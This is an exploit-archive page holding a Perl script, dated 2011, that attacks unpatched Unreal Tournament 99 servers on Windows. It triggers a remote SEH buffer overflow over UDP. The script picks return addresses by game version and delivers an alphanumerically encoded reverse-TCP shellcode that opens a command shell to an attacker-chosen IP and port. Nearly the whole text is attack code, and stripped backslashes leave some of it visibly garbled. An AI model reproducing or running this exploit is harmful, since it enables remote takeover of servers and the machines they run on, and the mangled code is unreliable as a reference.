[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Unreal Tournament Remote Buffer Overflow Exploit (SEH)
# Published : 2011-02-09
# Author : Fulcrum
# Previous Title : Linksys WAP610N Unauthenticated Root Access Security Vulnerability
# Next Title : Multiple Vendor Calendar Manager Remote Code Execution
# Unreal Tournament Remote Buffer Overflow Exploit (SEH) (Windows)
# Discovered by: Luigi Auriemma (http://aluigi.altervista.org/adv/unsecure-adv.txt)
# Coded By: Fulcrum (08/02/2011)
#
# Patch: http://www.unrealadmin.org/forums/showthread.php?t=15616
# Vulnerable: all ut99 servers without a patch.
# Tested on: win7 64-bit, xp sp3, vista sp2 with ut v400,436,440,451,451b
#
# Bad characters: 0x00 0x5c
# Maximum shellcode size: 938 bytes
#
# Thanks to: Metasploit, Heretic, Luigi Auriemma, Peter Van Eeckhoutte & Skylined
use IO::Socket::INET;
# Header
die "Usage: unreal_tournament-bof-win.pl <host> <query port> <reverse ip> <reverse port>n" unless ($ARGV[3]);
# Connect to the server
$socket = new IO::Socket::INET(PeerAddr => $ARGV[0],PeerPort => $ARGV[1], Proto => "udp", Timeout => 2) or die;
# Convert the reverse ip and port to hex format
$reverse_ip_hex = join("", unpack("H*", pack("c*", split(/./, $ARGV[2]))));
$reverse_port_hex = unpack("H*", pack("N", $ARGV[3]));
# Get the server version
$socket->send("\basic\");
$socket->recv($recvmsg, 512, 0);
# Create the special packet
$packet = "\secure\"; # header
if ($recvmsg =~ /gamever\(400|436)/) {
$packet .= "x41" x 24; # junk for ut v400,436
} else {
$packet .= "x41" x 64; # junk for ut v440,451,451b
}
$packet .= "xebx06x90x90"; # nseh / short jump to the shellcode
if ($recvmsg =~ /gamever\440/) {
$packet .= "x61xaex14x10"; # seh / 0x1014AE61 / pop ebx - pop - ret / core.dll v440
} else {
$packet .= "x98x53x13x10"; # seh / 0x10135398 / pop esi - pop - retbis / core.dll v400,436,451,451b
}
$packet .= "x90"; # nop
$packet .=
"xebx03x59xebx05xe8xf8xffxffxff".
"IIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"; # alphanumeric decoder from Skylined (getEIP code taken from Heretic)
$packet .= shellcode_encoder(
"xfcxe8x89x00x00x00x60x89xe5x31xd2x64x8bx52".
"x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26".
"x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0d".
"x01xc7xe2xf0x52x57x8bx52x10x8bx42x3cx01xd0".
"x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8b".
"x58x20x01xd3xe3x3cx49x8bx34x8bx01xd6x31xff".
"x31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7d".
"xf8x3bx7dx24x75xe2x58x8bx58x24x01xd3x66x8b".
"x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44".
"x24x24x5bx5bx61x59x5ax51xffxe0x58x5fx5ax8b".
"x12xebx86x5dx68x33x32x00x00x68x77x73x32x5f".
"x54x68x4cx77x26x07xffxd5xb8x90x01x00x00x29".
"xc4x54x50x68x29x80x6bx00xffxd5x50x50x50x50".
"x40x50x40x50x68xeax0fxdfxe0xffxd5x89xc7x68".
chr(hex(substr($reverse_ip_hex, 0, 2))). # 1st byte of the ip in hex
chr(hex(substr($reverse_ip_hex, 2, 2))). # 2nd byte of the ip in hex
chr(hex(substr($reverse_ip_hex, 4, 2))). # 3rd byte of the ip in hex
chr(hex(substr($reverse_ip_hex, 6, 2))). # 4th byte of the ip in hex
"x68x02x00".
chr(hex(substr($reverse_port_hex, 4, 2))). # 1st byte of the port in hex
chr(hex(substr($reverse_port_hex, 6, 2))). # 2nd byte of the port in hex
"x89xe6x6ax10x56".
"x57x68x99xa5x74x61xffxd5x68x63x6dx64x00x89".
"xe3x57x57x57x31xf6x6ax12x59x56xe2xfdx66xc7".
"x44x24x3cx01x01x8dx44x24x10xc6x00x44x54x50".
"x56x56x56x46x56x4ex56x56x53x56x68x79xccx3f".
"x86xffxd5x89xe0x4ex56x46xffx30x68x08x87x1d".
"x60xffxd5xbbxf0xb5xa2x56x68xa6x95xbdx9dxff".
"xd5x3cx06x7cx0ax80xfbxe0x75x05xbbx47x13x72".
"x6fx6ax00x53xffxd5"); # reverse tcp shellcode / ruby msfpayload windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 P
# Send the special packet
$socket->send($packet);
# Close the connection to the server
$socket->close();
exit;
# Alphanumeric encoder function from Skylined (Alpha2)
sub shellcode_encoder {
local $valid_chars, $shellcoded_encoded, $a, $b, $c, $d, $e, $f, $i, $j;
$valid_chars = "0123456789BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
$shellcoded_encoded = "";
for($i=0; $i<length($_[0]); $i++) {
$char = hex(unpack("H*", substr($_[0], $i, 1)));
$a = ($char & 0xf0) >> 4;
$b = ($char & 0x0f);
$f = $b;
$j = int(rand(length($valid_chars)));
while((hex(unpack("H*", substr($valid_chars, $j, 1))) & 0x0f) != $f) { $j = ++$j % length($valid_chars); }
$e = hex(unpack("H*", substr($valid_chars, $j, 1))) >> 4;
$d = ($a^$e);
$j = int(rand(length($valid_chars)));
while((hex(unpack("H*", substr($valid_chars, $j, 1))) & 0x0f) != $d) { $j = ++$j % length($valid_chars); }
$c = hex(unpack("H*", substr($valid_chars, $j, 1))) >> 4;
$shellcoded_encoded .= chr(($c<<4)+$d);
$shellcoded_encoded .= chr(($e<<4)+$f);
}
$shellcoded_encoded .= "x41";
return $shellcoded_encoded;
}